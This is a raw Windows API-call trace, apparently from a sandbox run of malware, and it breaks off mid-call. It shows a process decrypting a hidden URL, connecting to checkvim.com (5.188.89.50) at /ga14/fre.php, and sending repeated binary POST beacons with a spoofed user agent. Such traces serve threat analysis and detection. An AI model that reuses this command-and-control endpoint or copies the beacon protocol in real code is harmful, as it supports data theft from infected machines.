0x2ac [0216.801] Sleep (dwMilliseconds=0xea60) [0216.802] GetProcessHeap () returned 0x840000 [0216.802] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0216.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.804] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0216.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.912] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0216.920] GetProcessHeap () returned 0x840000 [0216.920] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0216.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.922] CryptImportKey (in: hProv=0x86ff90, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e570) returned 1 [0216.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.923] CryptSetKeyParam (hKey=0x87e570, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0216.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.928] CryptSetKeyParam (hKey=0x87e570, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.928] GetProcessHeap () returned 0x840000 [0216.928] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0216.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.929] CryptDecrypt (in: hKey=0x87e570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0216.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.930] CryptDestroyKey (hKey=0x87e570) returned 1 [0216.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.931] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0216.931] GetProcessHeap () returned 0x840000 [0216.931] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0216.931] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.932] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0216.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.933] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0216.934] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.934] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0216.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.935] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0216.935] GetProcessHeap () returned 0x840000 [0216.935] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0216.935] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0216.935] GetProcessHeap () returned 0x840000 [0216.935] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0216.936] GetProcessHeap () returned 0x840000 [0216.936] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0216.936] GetProcessHeap () returned 0x840000 [0216.936] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0216.936] GetProcessHeap () returned 0x840000 [0216.936] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f8c0 [0216.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.937] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0216.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.943] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f578) returned 1 [0216.950] GetProcessHeap () returned 0x840000 [0216.950] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0216.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.951] CryptImportKey (in: hProv=0x86f578, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0216.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.952] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0216.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.953] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.953] GetProcessHeap () returned 0x840000 [0216.953] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0216.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.954] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f8c0, pdwDataLen=0x19f9a4 | out: pbData=0x87f8c0, pdwDataLen=0x19f9a4) returned 1 [0216.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.955] CryptDestroyKey (hKey=0x87e270) returned 1 [0216.956] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.957] CryptReleaseContext (hProv=0x86f578, dwFlags=0x0) returned 1 [0216.957] GetProcessHeap () returned 0x840000 [0216.957] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0216.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.958] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0216.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.959] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0216.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.964] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0216.964] GetProcessHeap () returned 0x840000 [0216.964] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0216.964] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ba8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0216.966] GetProcessHeap () returned 0x840000 [0216.966] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b78 [0216.966] socket (af=2, type=1, protocol=6) returned 0x2b0 [0216.966] connect (s=0x2b0, name=0x878ba8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0217.040] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ba8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0217.040] GetProcessHeap () returned 0x840000 [0217.040] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0217.040] GetProcessHeap () returned 0x840000 [0217.040] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0217.041] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0217.042] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0217.042] GetProcessHeap () returned 0x840000 [0217.042] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0217.042] GetProcessHeap () returned 0x840000 [0217.042] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0217.042] GetProcessHeap () returned 0x840000 [0217.042] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fd88 [0217.042] GetProcessHeap () returned 0x840000 [0217.042] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0217.043] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0217.044] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0217.044] GetProcessHeap () returned 0x840000 [0217.044] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0217.044] GetProcessHeap () returned 0x840000 [0217.044] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0217.044] send (s=0x2b0, buf=0x873a58*, len=237, flags=0) returned 237 [0217.044] send (s=0x2b0, buf=0x87eb58*, len=159, flags=0) returned 159 [0217.045] GetProcessHeap () returned 0x840000 [0217.045] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0217.045] recv (in: s=0x2b0, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0217.406] GetProcessHeap () returned 0x840000 [0217.406] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0217.406] GetProcessHeap () returned 0x840000 [0217.406] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0217.406] GetProcessHeap () returned 0x840000 [0217.406] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0217.406] GetProcessHeap () returned 0x840000 [0217.406] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0217.406] closesocket (s=0x2b0) returned 0 [0217.407] GetProcessHeap () returned 0x840000 [0217.407] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b78 | out: hHeap=0x840000) returned 1 [0217.407] GetProcessHeap () returned 0x840000 [0217.407] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0217.407] GetProcessHeap () returned 0x840000 [0217.407] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f8c0 | out: hHeap=0x840000) returned 1 [0217.407] GetProcessHeap () returned 0x840000 [0217.407] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0217.408] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x828) returned 0x2b0 [0217.414] Sleep (dwMilliseconds=0xea60) [0217.487] GetProcessHeap () returned 0x840000 [0217.487] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fab8 [0217.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.488] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0217.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.515] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0217.525] GetProcessHeap () returned 0x840000 [0217.525] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0217.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.528] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0217.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.529] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0217.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.530] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.530] GetProcessHeap () returned 0x840000 [0217.530] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0217.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.531] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fab8, pdwDataLen=0x19f9a4 | out: pbData=0x87fab8, pdwDataLen=0x19f9a4) returned 1 [0217.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.540] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0217.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.542] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0217.542] GetProcessHeap () returned 0x840000 [0217.542] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0217.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0217.543] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0217.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0217.544] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0217.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0217.545] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0217.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0217.546] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0217.546] GetProcessHeap () returned 0x840000 [0217.547] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0217.547] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0217.547] GetProcessHeap () returned 0x840000 [0217.547] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0217.547] GetProcessHeap () returned 0x840000 [0217.547] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0217.547] GetProcessHeap () returned 0x840000 [0217.547] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fab8 | out: hHeap=0x840000) returned 1 [0217.547] GetProcessHeap () returned 0x840000 [0217.547] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fe18 [0217.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.548] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0217.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.554] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0217.561] GetProcessHeap () returned 0x840000 [0217.561] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0217.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.562] CryptImportKey (in: hProv=0x86fce8, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e370) returned 1 [0217.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.563] CryptSetKeyParam (hKey=0x87e370, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0217.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.564] CryptSetKeyParam (hKey=0x87e370, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.564] GetProcessHeap () returned 0x840000 [0217.564] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0217.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.565] CryptDecrypt (in: hKey=0x87e370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fe18, pdwDataLen=0x19f9a4 | out: pbData=0x87fe18, pdwDataLen=0x19f9a4) returned 1 [0217.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.566] CryptDestroyKey (hKey=0x87e370) returned 1 [0217.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0217.567] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0217.567] GetProcessHeap () returned 0x840000 [0217.567] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0217.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0217.568] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0217.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0217.569] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0217.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0217.570] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0217.570] GetProcessHeap () returned 0x840000 [0217.570] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0217.570] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0217.573] GetProcessHeap () returned 0x840000 [0217.573] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b48 [0217.573] socket (af=2, type=1, protocol=6) returned 0x2b4 [0217.573] connect (s=0x2b4, name=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0217.648] FreeAddrInfoW (pAddrInfo=0x8713d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0217.648] GetProcessHeap () returned 0x840000 [0217.648] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0217.648] GetProcessHeap () returned 0x840000 [0217.648] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0217.648] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0217.649] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0217.649] GetProcessHeap () returned 0x840000 [0217.649] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0217.649] GetProcessHeap () returned 0x840000 [0217.649] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0217.650] GetProcessHeap () returned 0x840000 [0217.650] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f908 [0217.650] GetProcessHeap () returned 0x840000 [0217.650] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0217.650] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0217.651] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0217.651] GetProcessHeap () returned 0x840000 [0217.651] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0217.651] GetProcessHeap () returned 0x840000 [0217.651] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0217.651] send (s=0x2b4, buf=0x873a58*, len=237, flags=0) returned 237 [0217.652] send (s=0x2b4, buf=0x87eb58*, len=159, flags=0) returned 159 [0217.653] GetProcessHeap () returned 0x840000 [0217.653] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0217.653] recv (in: s=0x2b4, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0218.064] GetProcessHeap () returned 0x840000 [0218.064] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0218.064] GetProcessHeap () returned 0x840000 [0218.064] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f908 | out: hHeap=0x840000) returned 1 [0218.064] GetProcessHeap () returned 0x840000 [0218.064] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0218.064] GetProcessHeap () returned 0x840000 [0218.064] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0218.064] closesocket (s=0x2b4) returned 0 [0218.065] GetProcessHeap () returned 0x840000 [0218.065] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b48 | out: hHeap=0x840000) returned 1 [0218.065] GetProcessHeap () returned 0x840000 [0218.065] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0218.065] GetProcessHeap () returned 0x840000 [0218.065] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0218.065] GetProcessHeap () returned 0x840000 [0218.065] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0218.066] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x188) returned 0x2b4 [0218.067] Sleep (dwMilliseconds=0xea60) [0218.069] GetProcessHeap () returned 0x840000 [0218.069] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0218.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.071] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0218.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.096] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0218.119] GetProcessHeap () returned 0x840000 [0218.119] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0218.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.121] CryptImportKey (in: hProv=0x86fce8, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e970) returned 1 [0218.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.122] CryptSetKeyParam (hKey=0x87e970, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0218.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.123] CryptSetKeyParam (hKey=0x87e970, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.123] GetProcessHeap () returned 0x840000 [0218.123] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0218.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.126] CryptDecrypt (in: hKey=0x87e970, hHash=0x0, Final=1, dwFlags=0x0, 